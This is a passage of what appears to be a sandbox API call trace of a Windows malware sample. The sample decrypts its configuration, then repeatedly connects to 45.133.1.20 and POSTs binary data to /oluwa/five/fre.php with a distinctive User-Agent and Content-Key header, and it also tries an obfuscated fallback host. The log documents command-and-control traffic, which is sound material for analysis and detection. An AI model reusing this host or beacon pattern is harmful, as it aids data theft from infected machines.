(lpLibFileName="shlwapi") returned 0x77680000 [0308.861] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0308.861] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0308.862] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0308.862] GetProcessHeap () returned 0x6a0000 [0308.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0308.862] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0308.862] GetProcessHeap () returned 0x6a0000 [0308.862] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa20 [0308.862] socket (af=2, type=1, protocol=6) returned 0xbb4 [0308.863] connect (s=0xbb4, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0308.893] FreeAddrInfoW (pAddrInfo=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0308.893] GetProcessHeap () returned 0x6a0000 [0308.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bec18 [0308.893] GetProcessHeap () returned 0x6a0000 [0308.893] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0308.894] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0308.895] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0308.895] GetProcessHeap () returned 0x6a0000 [0308.895] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6840 [0308.895] GetProcessHeap () returned 0x6a0000 [0308.896] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0308.896] GetProcessHeap () returned 0x6a0000 [0308.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0308.896] GetProcessHeap () returned 0x6a0000 [0308.896] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0308.897] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0308.900] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0308.900] GetProcessHeap () returned 0x6a0000 [0308.900] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0308.900] GetProcessHeap () returned 0x6a0000 [0308.900] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0308.901] send (s=0xbb4, buf=0x6bd460*, len=242, flags=0) returned 242 [0308.904] send (s=0xbb4, buf=0x6bb998*, len=159, flags=0) returned 159 [0308.904] GetProcessHeap () returned 0x6a0000 [0308.904] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0308.904] recv (in: s=0xbb4, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0308.975] GetProcessHeap () returned 0x6a0000 [0308.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0308.976] GetProcessHeap () returned 0x6a0000 [0308.976] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0308.976] GetProcessHeap () returned 0x6a0000 [0308.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6840 | out: hHeap=0x6a0000) returned 1 [0308.977] GetProcessHeap () returned 0x6a0000 [0308.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bec18 | out: hHeap=0x6a0000) returned 1 [0308.977] closesocket (s=0xbb4) returned 0 [0308.979] GetProcessHeap () returned 0x6a0000 [0308.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa20 | out: hHeap=0x6a0000) returned 1 [0308.979] GetProcessHeap () returned 0x6a0000 [0308.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0308.979] GetProcessHeap () returned 0x6a0000 [0308.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0308.980] GetProcessHeap () returned 0x6a0000 [0308.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0308.981] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18f4) returned 0xbb4 [0308.984] Sleep (dwMilliseconds=0xea60) [0308.986] GetProcessHeap () returned 0x6a0000 [0308.986] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0308.987] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.988] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0308.997] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0308.997] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf168) returned 1 [0309.013] GetProcessHeap () returned 0x6a0000 [0309.013] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0309.016] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.016] CryptImportKey (in: hProv=0x6bf168, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0309.017] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.018] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.019] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.019] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.019] GetProcessHeap () returned 0x6a0000 [0309.020] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0309.021] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.021] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0309.022] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.023] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0309.024] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.024] CryptReleaseContext (hProv=0x6bf168, dwFlags=0x0) returned 1 [0309.024] GetProcessHeap () returned 0x6a0000 [0309.024] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0309.028] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.028] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0309.029] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.029] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0309.030] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.031] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0309.032] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.032] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0309.032] GetProcessHeap () returned 0x6a0000 [0309.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0309.032] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0309.033] GetProcessHeap () returned 0x6a0000 [0309.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0309.033] GetProcessHeap () returned 0x6a0000 [0309.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0309.034] GetProcessHeap () returned 0x6a0000 [0309.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0309.034] GetProcessHeap () returned 0x6a0000 [0309.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0309.035] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.036] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.045] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.046] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6beca0) returned 1 [0309.056] GetProcessHeap () returned 0x6a0000 [0309.056] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0309.057] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.057] CryptImportKey (in: hProv=0x6beca0, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0309.058] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.058] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.059] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.060] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.060] GetProcessHeap () returned 0x6a0000 [0309.060] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0309.067] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.067] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0309.068] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.068] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0309.072] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.072] CryptReleaseContext (hProv=0x6beca0, dwFlags=0x0) returned 1 [0309.072] GetProcessHeap () returned 0x6a0000 [0309.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0309.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.074] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0309.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.075] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0309.076] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.076] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0309.077] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.078] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0309.078] GetProcessHeap () returned 0x6a0000 [0309.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0309.078] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0309.078] GetProcessHeap () returned 0x6a0000 [0309.078] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baab0 [0309.078] socket (af=2, type=1, protocol=6) returned 0xbb8 [0309.078] connect (s=0xbb8, name=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0309.101] FreeAddrInfoW (pAddrInfo=0x6b3490*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0309.101] GetProcessHeap () returned 0x6a0000 [0309.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6bef48 [0309.101] GetProcessHeap () returned 0x6a0000 [0309.101] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6def40 [0309.102] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0309.105] wvsprintfA (in: param_1=0x6def40, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0309.105] GetProcessHeap () returned 0x6a0000 [0309.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6b6c00 [0309.105] GetProcessHeap () returned 0x6a0000 [0309.105] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0309.105] GetProcessHeap () returned 0x6a0000 [0309.105] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0309.106] GetProcessHeap () returned 0x6a0000 [0309.106] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6def40 [0309.106] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0309.107] wvsprintfA (in: param_1=0x6def40, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0309.107] GetProcessHeap () returned 0x6a0000 [0309.107] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0309.107] GetProcessHeap () returned 0x6a0000 [0309.108] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6def40 | out: hHeap=0x6a0000) returned 1 [0309.108] send (s=0xbb8, buf=0x6bd460*, len=242, flags=0) returned 242 [0309.108] send (s=0xbb8, buf=0x6bb998*, len=159, flags=0) returned 159 [0309.109] GetProcessHeap () returned 0x6a0000 [0309.109] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6da320 [0309.109] recv (in: s=0xbb8, buf=0x6da320, len=4048, flags=0 | out: buf=0x6da320*) returned 204 [0309.177] GetProcessHeap () returned 0x6a0000 [0309.177] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0309.177] GetProcessHeap () returned 0x6a0000 [0309.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4a30 | out: hHeap=0x6a0000) returned 1 [0309.178] GetProcessHeap () returned 0x6a0000 [0309.178] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b6c00 | out: hHeap=0x6a0000) returned 1 [0309.179] GetProcessHeap () returned 0x6a0000 [0309.179] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0309.179] closesocket (s=0xbb8) returned 0 [0309.180] GetProcessHeap () returned 0x6a0000 [0309.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baab0 | out: hHeap=0x6a0000) returned 1 [0309.180] GetProcessHeap () returned 0x6a0000 [0309.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0309.180] GetProcessHeap () returned 0x6a0000 [0309.180] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0309.180] GetProcessHeap () returned 0x6a0000 [0309.181] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0309.181] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6da320, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x18f8) returned 0xbb8 [0309.183] Sleep (dwMilliseconds=0xea60) [0309.184] GetProcessHeap () returned 0x6a0000 [0309.184] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4760 [0309.185] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.185] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.194] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.195] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0309.201] GetProcessHeap () returned 0x6a0000 [0309.201] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6dc8d0 [0309.204] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.204] CryptImportKey (in: hProv=0x6befd0, pbData=0x6dc8d0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0309.205] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.205] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.206] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.206] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.206] GetProcessHeap () returned 0x6a0000 [0309.207] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc8d0 | out: hHeap=0x6a0000) returned 1 [0309.207] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.208] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4760, pdwDataLen=0x19fcfc | out: pbData=0x6b4760, pdwDataLen=0x19fcfc) returned 1 [0309.209] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.209] CryptDestroyKey (hKey=0x6ad020) returned 1 [0309.210] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.210] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0309.211] GetProcessHeap () returned 0x6a0000 [0309.211] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0309.211] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.212] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0309.212] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.216] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0309.220] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.221] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0309.222] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.222] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0309.222] GetProcessHeap () returned 0x6a0000 [0309.222] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3580 [0309.222] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0309.223] GetProcessHeap () returned 0x6a0000 [0309.223] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3580 | out: hHeap=0x6a0000) returned 1 [0309.224] GetProcessHeap () returned 0x6a0000 [0309.224] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0309.225] GetProcessHeap () returned 0x6a0000 [0309.225] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4760 | out: hHeap=0x6a0000) returned 1 [0309.225] GetProcessHeap () returned 0x6a0000 [0309.225] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4d48 [0309.226] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.227] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0309.233] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.234] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0309.245] GetProcessHeap () returned 0x6a0000 [0309.245] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0af0 [0309.248] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.249] CryptImportKey (in: hProv=0x6befd0, pbData=0x6b0af0, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0309.250] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.250] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0309.251] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.251] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0309.252] GetProcessHeap () returned 0x6a0000 [0309.252] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0af0 | out: hHeap=0x6a0000) returned 1 [0309.253] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.253] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4d48, pdwDataLen=0x19fcfc | out: pbData=0x6b4d48, pdwDataLen=0x19fcfc) returned 1 [0309.255] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.256] CryptDestroyKey (hKey=0x6ad020) returned 1 [0309.257] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0309.258] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0309.258] GetProcessHeap () returned 0x6a0000 [0309.258] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0309.259] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.259] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0309.260] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.261] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0309.262] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.262] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0309.263] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0309.264] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0309.264] GetProcessHeap () returned 0x6a0000 [0309.264] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3670 [0309.264] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3800*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb08*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 